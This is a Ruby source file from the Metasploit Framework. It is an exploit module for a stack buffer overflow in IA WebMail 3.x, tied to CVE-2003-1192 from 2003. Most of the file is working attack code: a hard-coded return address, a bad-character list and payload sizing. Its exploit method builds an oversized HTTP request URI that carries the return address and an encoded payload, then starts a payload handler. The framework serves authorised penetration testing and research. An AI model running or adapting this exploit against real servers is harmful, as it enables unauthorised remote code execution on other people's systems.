metasploit-framework/modules/exploits/windows/http/ia_webmail.rb

80 lines
1.6 KiB
Ruby

##
# $Id:$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Exploits::Windows::Http::IaWebmail < Msf::Exploit::Remote
include Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'IA WebMail 3.x Buffer Overflow',
'Description' => %q{
This exploits a stack overflow in the IA WebMail server.
This exploit has not been tested against a live system at
this time.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '8965'],
[ 'CVE', '2003-1192'],
[ 'OSVDB', '2757'],
[ 'URL', 'http://www.k-otik.net/exploits/11.19.iawebmail.pl.php'],
[ 'MIL', '24'],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
},
'Platform' => 'win',
'Targets' =>
[
[
'IA WebMail 3.x',
{
'Ret' => 0x1002bd33,
'Length' => 1036
},
]
],
'DisclosureDate' => 'Nov 3 2003',
'DefaultTarget' => 0))
end
def exploit
print_status("Sending request...")
send_request_raw({
'uri' =>
"/" + ("o" * target['Length']) +
"META" +
[target.ret].pack('V') +
payload.encoded
}, 2)
handler
end
end
end